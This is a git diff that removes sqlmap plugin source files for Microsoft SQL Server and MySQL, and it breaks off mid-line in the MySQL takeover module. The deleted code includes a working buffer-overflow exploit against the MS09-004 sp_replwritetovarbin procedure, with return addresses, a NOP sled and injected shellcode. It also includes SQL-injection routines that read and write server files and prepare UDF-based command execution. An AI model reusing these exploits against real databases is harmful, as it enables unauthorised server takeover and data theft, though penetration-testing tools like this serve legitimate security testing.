'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHAR(97)+CHAR(98)+CHAR(99)+CHAR(100)+CHAR(101)+CHAR(102)+CHAR(103)+CHAR(104) FROM foobar' - """ - - def escaper(value): - return "+".join("%s(%d)" % ("CHAR" if ord(value[i]) < 256 else "NCHAR", ord(value[i])) for i in xrange(len(value))) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mssqlserver/takeover.py b/plugins/dbms/mssqlserver/takeover.py deleted file mode 100644 index 3d9ff14e..00000000 --- a/plugins/dbms/mssqlserver/takeover.py +++ /dev/null @@ -1,143 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii - -from lib.core.common import Backend -from lib.core.data import logger -from lib.core.exception import SqlmapUnsupportedFeatureException -from lib.request import inject -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - self.spExploit = "" - - GenericTakeover.__init__(self) - - def uncPathRequest(self): - #inject.goStacked("EXEC master..xp_fileexist '%s'" % self.uncPath, silent=True) - inject.goStacked("EXEC master..xp_dirtree '%s'" % self.uncPath) - - def spHeapOverflow(self): - """ - References: - * http://www.microsoft.com/technet/security/bulletin/MS09-004.mspx - * http://support.microsoft.com/kb/959420 - """ - - returns = { - # 2003 Service Pack 0 - "2003-0": (""), - - # 2003 Service Pack 1 - "2003-1": ("CHAR(0xab)+CHAR(0x2e)+CHAR(0xe6)+CHAR(0x7c)", "CHAR(0xee)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0xb5)+CHAR(0x60)+CHAR(0xa8)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x03)+CHAR(0x1d)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x13)+CHAR(0xe4)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)", "CHAR(0x1e)+CHAR(0x1d)+CHAR(0x88)+CHAR(0x7c)" ), - - # 2003 Service Pack 2 updated at 12/2008 - #"2003-2": ("CHAR(0xe4)+CHAR(0x37)+CHAR(0xea)+CHAR(0x7c)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)", "CHAR(0x1b)+CHAR(0xa0)+CHAR(0x86)+CHAR(0x7c)" ), - - # 2003 Service Pack 2 updated at 05/2009 - "2003-2": ("CHAR(0xc3)+CHAR(0xdb)+CHAR(0x67)+CHAR(0x77)", "CHAR(0x15)+CHAR(0xc9)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x96)+CHAR(0xdc)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x73)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x47)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0x0f)+CHAR(0x31)+CHAR(0x8e)+CHAR(0x7c)"), - - # 2003 Service Pack 2 updated at 09/2009 - #"2003-2": ("CHAR(0xc3)+CHAR(0xc2)+CHAR(0xed)+CHAR(0x7c)", "CHAR(0xf3)+CHAR(0xd9)+CHAR(0xa7)+CHAR(0x7c)", "CHAR(0x99)+CHAR(0xc8)+CHAR(0x93)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x63)+CHAR(0x1e)+CHAR(0x8f)+CHAR(0x7c)", "CHAR(0x17)+CHAR(0xf5)+CHAR(0x83)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)", "CHAR(0xa4)+CHAR(0xde)+CHAR(0x8e)+CHAR(0x7c)"), - } - addrs = None - - for versionSp, data in returns.items(): - version, sp = versionSp.split("-") - sp = int(sp) - - if Backend.getOsVersion() == version and Backend.getOsServicePack() == sp: - addrs = data - - break - - if not addrs: - errMsg = "sqlmap can not exploit the stored procedure buffer " - errMsg += "overflow because it does not have a valid return " - errMsg += "code for the underlying operating system (Windows " - errMsg += "%s Service Pack %d)" % (Backend.getOsVersion(), Backend.getOsServicePack()) - raise SqlmapUnsupportedFeatureException(errMsg) - - shellcodeChar = "" - hexStr = binascii.hexlify(self.shellcodeString[:-1]) - - for hexPair in xrange(0, len(hexStr), 2): - shellcodeChar += "CHAR(0x%s)+" % hexStr[hexPair:hexPair + 2] - - shellcodeChar = shellcodeChar[:-1] - - self.spExploit = """DECLARE @buf NVARCHAR(4000), - @val NVARCHAR(4), - @counter INT - SET @buf = ' - DECLARE @retcode int, @end_offset int, @vb_buffer varbinary, @vb_bufferlen int - EXEC master.dbo.sp_replwritetovarbin 347, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' - SET @val = CHAR(0x41) - SET @counter = 0 - WHILE @counter < 3320 - BEGIN - SET @counter = @counter + 1 - IF @counter = 411 - BEGIN - /* pointer to call [ecx+8] */ - SET @buf = @buf + %s - - /* push ebp, pop esp, ret 4 */ - SET @buf = @buf + %s - - /* push ecx, pop esp, pop ebp, retn 8 */ - SET @buf = @buf + %s - - /* Garbage */ - SET @buf = @buf + CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51) - - /* retn 1c */ - SET @buf = @buf + %s - - /* retn 1c */ - SET @buf = @buf + %s - - /* anti DEP */ - SET @buf = @buf + %s - - /* jmp esp */ - SET @buf = @buf + %s - - /* jmp esp */ - SET @buf = @buf + %s - - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - SET @buf = @buf + CHAR(0x90)+CHAR(0x90)+CHAR(0x90)+CHAR(0x90) - - set @buf = @buf + CHAR(0x64)+CHAR(0x8B)+CHAR(0x25)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00)+CHAR(0x00) - set @buf = @buf + CHAR(0x8B)+CHAR(0xEC) - set @buf = @buf + CHAR(0x83)+CHAR(0xEC)+CHAR(0x20) - - /* Metasploit shellcode */ - SET @buf = @buf + %s - - SET @buf = @buf + CHAR(0x6a)+CHAR(0x00)+char(0xc3) - SET @counter = @counter + 302 - SET @val = CHAR(0x43) - CONTINUE - END - SET @buf = @buf + @val - END - SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' - EXEC master..sp_executesql @buf - """ % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar) - - self.spExploit = self.spExploit.replace(" ", "").replace("\n", " ") - - logger.info("triggering the buffer overflow vulnerability, please wait..") - inject.goStacked(self.spExploit, silent=True) diff --git a/plugins/dbms/mysql/__init__.py b/plugins/dbms/mysql/__init__.py deleted file mode 100644 index bd0d9e20..00000000 --- a/plugins/dbms/mysql/__init__.py +++ /dev/null @@ -1,39 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import MYSQL_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.mysql.enumeration import Enumeration -from plugins.dbms.mysql.filesystem import Filesystem -from plugins.dbms.mysql.fingerprint import Fingerprint -from plugins.dbms.mysql.syntax import Syntax -from plugins.dbms.mysql.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class MySQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines MySQL methods - """ - - def __init__(self): - self.excludeDbsList = MYSQL_SYSTEM_DBS - self.sysUdfs = { - # UDF name: UDF return data-type - "sys_exec": { "return": "int" }, - "sys_eval": { "return": "string" }, - "sys_bineval": { "return": "int" } - } - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.MYSQL] = Syntax.escape diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py deleted file mode 100644 index fd8406b3..00000000 --- a/plugins/dbms/mysql/connector.py +++ /dev/null @@ -1,73 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import pymysql -except ImportError: - pass - -import logging - -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://code.google.com/p/pymysql/ - User guide: http://code.google.com/p/pymysql/ - API: http://code.google.com/p/pymysql/ - Debian package: - License: MIT - - Possible connectors: http://wiki.python.org/moin/MySQL - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - - try: - self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) - except (pymysql.OperationalError, pymysql.InternalError), msg: - raise SqlmapConnectionException(msg[1]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except pymysql.ProgrammingError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(query) - retVal = True - except (pymysql.OperationalError, pymysql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - except pymysql.InternalError, msg: - raise SqlmapConnectionException(msg[1]) - - self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - if self.execute(query): - retVal = self.fetchall() - - return retVal diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py deleted file mode 100644 index 60e7cd14..00000000 --- a/plugins/dbms/mysql/enumeration.py +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py deleted file mode 100644 index 344c467e..00000000 --- a/plugins/dbms/mysql/filesystem.py +++ /dev/null @@ -1,141 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import isNumPosStrValue -from lib.core.common import isTechniqueAvailable -from lib.core.common import popValue -from lib.core.common import pushValue -from lib.core.common import randomStr -from lib.core.common import singleTimeWarnMessage -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import CHARSET_TYPE -from lib.core.enums import EXPECTED -from lib.core.enums import PAYLOAD -from lib.core.enums import PLACE -from lib.core.exception import SqlmapNoneDataException -from lib.request import inject -from lib.techniques.union.use import unionUse -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def nonStackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) - - result = inject.getValue("HEX(LOAD_FILE('%s'))" % rFile, charsetType=CHARSET_TYPE.HEXADECIMAL) - - return result - - def stackedReadFile(self, rFile): - infoMsg = "fetching file: '%s'" % rFile - logger.info(infoMsg) - - self.createSupportTbl(self.fileTblName, self.tblField, "longtext") - self.getRemoteTempPath() - - tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True)) - - debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile - debugMsg += "into temporary file '%s'" % tmpFile - logger.debug(debugMsg) - inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile)) - - debugMsg = "loading the content of hexadecimal encoded file " - debugMsg += "'%s' into support table" % rFile - logger.debug(debugMsg) - inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField)) - - length = inject.getValue("SELECT LENGTH(%s) FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) - - if not isNumPosStrValue(length): - warnMsg = "unable to retrieve the content of the " - warnMsg += "file '%s'" % rFile - - if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): - warnMsg += ", going to fall-back to simpler UNION technique" - logger.warn(warnMsg) - result = self.nonStackedReadFile(rFile) - else: - raise SqlmapNoneDataException(warnMsg) - else: - length = int(length) - sustrLen = 1024 - - if length > sustrLen: - result = [] - - for i in xrange(1, length, sustrLen): - chunk = inject.getValue("SELECT MID(%s, %d, %d) FROM %s" % (self.tblField, i, sustrLen, self.fileTblName), unpack=False, resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - - result.append(chunk) - else: - result = inject.getValue("SELECT %s FROM %s" % (self.tblField, self.fileTblName), resumeValue=False, charsetType=CHARSET_TYPE.HEXADECIMAL) - - return result - - def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): - logger.debug("encoding file to its hexadecimal string value") - - fcEncodedList = self.fileEncode(wFile, "hex", True) - fcEncodedStr = fcEncodedList[0] - fcEncodedStrLen = len(fcEncodedStr) - - if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000: - warnMsg = "the injection is on a GET parameter and the file " - warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen - warnMsg += "bytes, this might cause errors in the file " - warnMsg += "writing process" - logger.warn(warnMsg) - - debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) - logger.debug(debugMsg) - - pushValue(kb.forceWhere) - kb.forceWhere = PAYLOAD.WHERE.NEGATIVE - sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile) - unionUse(sqlQuery, unpack=False) - kb.forceWhere = popValue() - - warnMsg = "expect junk characters inside the " - warnMsg += "file as a leftover from UNION query" - singleTimeWarnMessage(warnMsg) - - return self.askCheckWrittenFile(wFile, dFile, forceCheck) - - def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): - debugMsg = "creating a support table to write the hexadecimal " - debugMsg += "encoded file to" - logger.debug(debugMsg) - - self.createSupportTbl(self.fileTblName, self.tblField, "longblob") - - logger.debug("encoding file to its hexadecimal string value") - fcEncodedList = self.fileEncode(wFile, "hex", False) - - debugMsg = "forging SQL statements to write the hexadecimal " - debugMsg += "encoded file to the support table" - logger.debug(debugMsg) - - sqlQueries = self.fileToSqlQueries(fcEncodedList) - - logger.debug("inserting the hexadecimal encoded file to the support table") - - for sqlQuery in sqlQueries: - inject.goStacked(sqlQuery) - - debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) - logger.debug(debugMsg) - - # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html - inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True) - - return self.askCheckWrittenFile(wFile, dFile, forceCheck) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py deleted file mode 100644 index 5cd9a5c4..00000000 --- a/plugins/dbms/mysql/fingerprint.py +++ /dev/null @@ -1,286 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import getUnicode -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import MYSQL_ALIASES -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.MYSQL) - - def _commentCheck(self): - infoMsg = "executing %s comment injection fingerprint" % DBMS.MYSQL - logger.info(infoMsg) - - result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/* NoValue */") - - if not result: - warnMsg = "unable to perform %s comment injection" % DBMS.MYSQL - logger.warn(warnMsg) - - return None - - # MySQL valid versions updated on 04/2011 - versions = ( - (32200, 32235), # MySQL 3.22 - (32300, 32359), # MySQL 3.23 - (40000, 40032), # MySQL 4.0 - (40100, 40131), # MySQL 4.1 - (50000, 50092), # MySQL 5.0 - (50100, 50156), # MySQL 5.1 - (50400, 50404), # MySQL 5.4 - (50500, 50521), # MySQL 5.5 - (50600, 50604), # MySQL 5.6 - (60000, 60014), # MySQL 6.0 - ) - - index = -1 - for i in xrange(len(versions)): - element = versions[i] - version = element[0] - version = getUnicode(version) - result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/*!%s AND [RANDNUM1]=[RANDNUM2]*/" % version) - - if result: - break - else: - index += 1 - - if index >= 0: - prevVer = None - - for version in xrange(versions[index][0], versions[index][1] + 1): - version = getUnicode(version) - result = inject.checkBooleanExpression("[RANDNUM]=[RANDNUM]/*!%s AND [RANDNUM1]=[RANDNUM2]*/" % version) - - if result: - if not prevVer: - prevVer = version - - if version[0] == "3": - midVer = prevVer[1:3] - else: - midVer = prevVer[2] - - trueVer = "%s.%s.%s" % (prevVer[0], midVer, prevVer[3:]) - - return trueVer - - prevVer = version - - return None - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp and not hasattr(conf, "api"): - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp and not hasattr(conf, "api"): - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - actVer = Format.getDbms() - - if not conf.extensiveFp: - value += actVer - return value - - comVer = self._commentCheck() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if comVer: - comVer = Format.getDbms([comVer]) - value += "\n%scomment injection fingerprint: %s" % (blank, comVer) - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if "dbmsVersion" in kb.bannerFp else None - - if banVer and re.search("-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer] if banVer else None) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - """ - References for fingerprint: - - * http://dev.mysql.com/doc/refman/5.0/en/news-5-0-x.html (up to 5.0.89) - * http://dev.mysql.com/doc/refman/5.1/en/news-5-1-x.html (up to 5.1.42) - * http://dev.mysql.com/doc/refman/5.4/en/news-5-4-x.html (up to 5.4.4) - * http://dev.mysql.com/doc/refman/5.5/en/news-5-5-x.html (up to 5.5.0) - * http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn) - """ - - if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \ - or (conf.dbms or "").lower() in MYSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - - setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion())) - - if Backend.isVersionGreaterOrEqualThan("5"): - kb.data.has_information_schema = True - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.MYSQL - logger.info(infoMsg) - - result = inject.checkBooleanExpression("QUARTER(NULL) IS NULL") - - if result: - infoMsg = "confirming %s" % DBMS.MYSQL - logger.info(infoMsg) - - result = inject.checkBooleanExpression("SESSION_USER() LIKE USER()") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) - - return False - - # reading information_schema on some platforms is causing annoying timeout exits - # Reference: http://bugs.mysql.com/bug.php?id=15855 - - # Determine if it is MySQL >= 5.0.0 - if inject.checkBooleanExpression("ISNULL(TIMESTAMPADD(MINUTE,[RANDNUM],NULL))"): - kb.data.has_information_schema = True - Backend.setVersion(">= 5.0.0") - setDbms("%s 5" % DBMS.MYSQL) - self.getBanner() - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % DBMS.MYSQL - logger.info(infoMsg) - - # Check if it is MySQL >= 5.5.0 - if inject.checkBooleanExpression("TO_SECONDS(950501)>0"): - Backend.setVersion(">= 5.5.0") - - # Check if it is MySQL >= 5.1.2 and < 5.5.0 - elif inject.checkBooleanExpression("@@table_open_cache=@@table_open_cache"): - if inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.GLOBAL_STATUS LIMIT 0, 1)"): - Backend.setVersionList([">= 5.1.12", "< 5.5.0"]) - elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PROCESSLIST LIMIT 0, 1)"): - Backend.setVersionList([">= 5.1.7", "< 5.1.12"]) - elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PARTITIONS LIMIT 0, 1)"): - Backend.setVersion("= 5.1.6") - elif inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM information_schema.PLUGINS LIMIT 0, 1)"): - Backend.setVersionList([">= 5.1.5", "< 5.1.6"]) - else: - Backend.setVersionList([">= 5.1.2", "< 5.1.5"]) - - # Check if it is MySQL >= 5.0.0 and < 5.1.2 - elif inject.checkBooleanExpression("@@hostname=@@hostname"): - Backend.setVersionList([">= 5.0.38", "< 5.1.2"]) - elif inject.checkBooleanExpression("@@character_set_filesystem=@@character_set_filesystem"): - Backend.setVersionList([">= 5.0.19", "< 5.0.38"]) - elif not inject.checkBooleanExpression("[RANDNUM]=(SELECT [RANDNUM] FROM DUAL WHERE [RANDNUM1]!=[RANDNUM2])"): - Backend.setVersionList([">= 5.0.11", "< 5.0.19"]) - elif inject.checkBooleanExpression("@@div_precision_increment=@@div_precision_increment"): - Backend.setVersionList([">= 5.0.6", "< 5.0.11"]) - elif inject.checkBooleanExpression("@@automatic_sp_privileges=@@automatic_sp_privileges"): - Backend.setVersionList([">= 5.0.3", "< 5.0.6"]) - else: - Backend.setVersionList([">= 5.0.0", "< 5.0.3"]) - - elif inject.checkBooleanExpression("DATABASE() LIKE SCHEMA()"): - Backend.setVersion(">= 5.0.2") - setDbms("%s 5" % DBMS.MYSQL) - self.getBanner() - - elif inject.checkBooleanExpression("STRCMP(LOWER(CURRENT_USER()), UPPER(CURRENT_USER()))=0"): - Backend.setVersion("< 5.0.0") - setDbms("%s 4" % DBMS.MYSQL) - self.getBanner() - - if not conf.extensiveFp: - return True - - # Check which version of MySQL < 5.0.0 it is - if inject.checkBooleanExpression("3=(SELECT COERCIBILITY(USER()))"): - Backend.setVersionList([">= 4.1.11", "< 5.0.0"]) - elif inject.checkBooleanExpression("2=(SELECT COERCIBILITY(USER()))"): - Backend.setVersionList([">= 4.1.1", "< 4.1.11"]) - elif inject.checkBooleanExpression("CURRENT_USER()=CURRENT_USER()"): - Backend.setVersionList([">= 4.0.6", "< 4.1.1"]) - - if inject.checkBooleanExpression("'utf8'=(SELECT CHARSET(CURRENT_USER()))"): - Backend.setVersion("= 4.1.0") - else: - Backend.setVersionList([">= 4.0.6", "< 4.1.0"]) - else: - Backend.setVersionList([">= 4.0.0", "< 4.0.6"]) - else: - Backend.setVersion("< 4.0.0") - setDbms("%s 3" % DBMS.MYSQL) - self.getBanner() - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL - logger.warn(warnMsg) - - return False - - def checkDbmsOs(self, detailed=False): - if Backend.getOs(): - return - - infoMsg = "fingerprinting the back-end DBMS operating system" - logger.info(infoMsg) - - result = inject.checkBooleanExpression("'W'=UPPER(MID(@@version_compile_os,1,1))") - - if result: - Backend.setOs(OS.WINDOWS) - elif not result: - Backend.setOs(OS.LINUX) - - if Backend.getOs(): - infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs() - logger.info(infoMsg) - else: - self.userChooseDbmsOs() - - self.cleanup(onlyFileTbl=True) diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py deleted file mode 100644 index 77c3a73e..00000000 --- a/plugins/dbms/mysql/syntax.py +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii - -from lib.core.convert import utf8encode -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT 0x6162636465666768 FROM foobar' - """ - - def escaper(value): - retVal = None - try: - retVal = "0x%s" % binascii.hexlify(value) - except UnicodeEncodeError: - retVal = "CONVERT(0x%s USING utf8)" % "".join("%.2x" % ord(_) for _ in utf8encode(value)) - return retVal - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py deleted file mode 100644 index f3c26d1e..00000000 --- a/plugins/dbms/mysql/takeover.py +++ /dev/null @@ -1,119 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.agent import agent -from lib.core.common import Backend -from lib.core.common import decloakToTemp -from lib.core.common import isStackingAvailable -from lib.core.common import normalizePath -from lib.core.common import ntToPosixSlashes -from lib.core.common import randomStr -from lib.core.common import unArrayizeValue -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.enums import OS -from lib.request import inject -from lib.request.connect import Connect as Request -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - self.__basedir = None - self.__datadir = None - self.__plugindir = None - - GenericTakeover.__init__(self) - - def udfSetRemotePath(self): - self.getVersionFromBanner() - - banVer = kb.bannerFp["dbmsVersion"] - - if banVer >= "5.0.67": - if self.__plugindir is None: - logger.info("retrieving MySQL plugin directory absolute path") - self.__plugindir = unArrayizeValue(inject.getValue("SELECT @@plugin_dir")) - - # On MySQL 5.1 >= 5.1.19 and on any version of MySQL 6.0 - if self.__plugindir is None and banVer >= "5.1.19": - logger.info("retrieving MySQL base directory absolute path") - - # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_basedir - self.__basedir = unArrayizeValue(inject.getValue("SELECT @@basedir")) - - if re.search("^[\w]\:[\/\\\\]+", (self.__basedir or ""), re.I): - Backend.setOs(OS.WINDOWS) - else: - Backend.setOs(OS.LINUX) - - # The DLL must be in C:\Program Files\MySQL\MySQL Server 5.1\lib\plugin - if Backend.isOs(OS.WINDOWS): - self.__plugindir = "%s/lib/plugin" % self.__basedir - else: - self.__plugindir = "%s/lib/mysql/plugin" % self.__basedir - - self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir)) or '.' - - self.udfRemoteFile = "%s/%s.%s" % (self.__plugindir, self.udfSharedLibName, self.udfSharedLibExt) - - # On MySQL 4.1 < 4.1.25 and on MySQL 4.1 >= 4.1.25 with NO plugin_dir set in my.ini configuration file - # On MySQL 5.0 < 5.0.67 and on MySQL 5.0 >= 5.0.67 with NO plugin_dir set in my.ini configuration file - else: - #logger.debug("retrieving MySQL data directory absolute path") - - # Reference: http://dev.mysql.com/doc/refman/5.1/en/server-options.html#option_mysqld_datadir - #self.__datadir = inject.getValue("SELECT @@datadir") - - # NOTE: specifying the relative path as './udf.dll' - # saves in @@datadir on both MySQL 4.1 and MySQL 5.0 - self.__datadir = '.' - self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir)) - - # The DLL can be in either C:\WINDOWS, C:\WINDOWS\system, - # C:\WINDOWS\system32, @@basedir\bin or @@datadir - self.udfRemoteFile = "%s/%s.%s" % (self.__datadir, self.udfSharedLibName, self.udfSharedLibExt) - - def udfSetLocalPaths(self): - self.udfLocalFile = paths.SQLMAP_UDF_PATH - self.udfSharedLibName = "libs%s" % randomStr(lowercase=True) - - if 